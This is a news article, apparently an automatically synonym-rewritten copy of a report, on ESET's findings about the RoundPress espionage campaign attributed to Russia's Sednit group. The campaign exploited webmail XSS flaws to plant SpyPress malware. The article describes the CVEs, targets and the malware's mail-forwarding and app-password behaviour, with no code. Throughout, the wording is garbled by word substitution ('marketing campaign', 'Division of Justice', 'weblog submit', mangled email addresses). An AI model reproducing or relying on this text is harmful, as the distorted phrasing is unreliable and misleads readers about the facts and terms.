ESET stories on RoundPress, a cyber espionage marketing campaign by Russia’s Fancy Bear (Sednit) focusing on Ukraine-related organizations through webmail vulnerabilities and SpyPress malware.
Cybersecurity researchers at ESET have revealed a classy cyber espionage marketing campaign, codenamed RoundPress, assessing with “medium confidence” that it’s orchestrated by the Russian-backed Sednit group (aka APT28, Fancy Bear). This operation is actively focusing on organizations linked with the continuing battle in Ukraine, aiming to exfiltrate confidential knowledge from weak webmail servers like RoundCube.
The Sednit group, linked by the US Division of Justice to the 2016 Democratic Nationwide Committee (DNC) hack and tracked by Hackread.com in assaults on TV5Monde and WADA, has been using focused spearphishing emails within the RoundPress marketing campaign.
These emails exploit Cross-Web site Scripting (XSS) vulnerabilities in numerous webmail platforms to inject malicious JavaScript code, dubbed SpyPress, into the sufferer’s browser.
Exploiting Recognized and Zero-Day Vulnerabilities in Webmail Methods
In ESET’s weblog submit, shared with Hackread.com, researchers famous that over the previous two years, espionage teams have focused webmail servers like Roundcube and Zimbra for electronic mail theft as a result of their outdated nature and distant vulnerability triggers making focusing on simpler.
In 2023, researchers noticed Sednit exploiting CVE-2020-35730 in Roundcube. Nevertheless, in 2024, the marketing campaign expanded to focus on vulnerabilities in:
- Horde (an older XSS flaw)
- Zimbra (CVE-2024-27443, often known as ZBUG-3730, patched on March 1, 2024)
- MDaemon (CVE-2024-11182, a zero-day reported by researchers on November 1, 2024, and patched in model 24.5.1 on November 14, 2024)
ESET famous a selected spearphishing electronic mail despatched on September 29, 2023, from katecohen1984@portugalmailpt exploiting CVE‑2023‑43770 in Roundcube. The emails typically mimic information content material to entice victims to open them, akin to an electronic mail to a Ukrainian goal on September 11, 2024, from kyivinfo24@ukrnet about an alleged arrest in Kharkiv, and one other to a Bulgarian goal on November 8, 2024, from workplace@terembgcom relating to Putin and Trump.
Major Give attention to Ukraine-Associated Entities
The first targets of Operation RoundPress in 2024, as recognized by way of ESET telemetry and VirusTotal submissions, are predominantly Ukrainian governmental entities and defence firms in Bulgaria and Romania, a few of that are producing Soviet-era weapons for Ukraine.
Researchers additionally noticed focusing on of nationwide governments in Greece, Cameroon, Ecuador, Serbia, and Cyprus (a tutorial in environmental research), a telecommunications agency for the defence sector in Bulgaria and a civil air transport firm and transportation state firm in Ukraine.
The SpyPress malware variants (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) share obfuscation methods and talk with C2 servers through HTTP POST requests. Nevertheless, their capabilities range.
As an illustration, SpyPress.ROUNDCUBE has been noticed creating Sieve guidelines to ahead all incoming emails to an attacker-controlled handle, akin to srezoska@skiffcom (Skiff being a privacy-oriented electronic mail service). SpyPress.MDAEMON demonstrated the flexibility to create App Passwords, granting persistent entry.
Researchers concluded that the continuing exploitation of webmail vulnerabilities by teams like Sednit underscores the significance of well timed patching and powerful safety measures to guard delicate info from such focused spying campaigns.
J Stephen Kowski, Area CTO at SlashNext E-mail Safety+ commented on the newest growth, stating, “Assaults like Operation RoundPress present how shortly hackers can shift targets, particularly after they discover weaknesses in in style electronic mail platforms.“
“Whether or not you’re utilizing paid business electronic mail techniques or free, self-hosted open-source choices like RoundCube, no answer is totally secure – self-hosted techniques typically give a false sense of safety since they nonetheless want common updates and knowledgeable upkeep,“ he warned.
“One of the simplest ways to remain forward is by ensuring electronic mail techniques are all the time up to date and patched, utilizing robust protections like multi-factor authentication, and having instruments that may spot and block phishing emails earlier than they attain customers,” Kowski suggested.
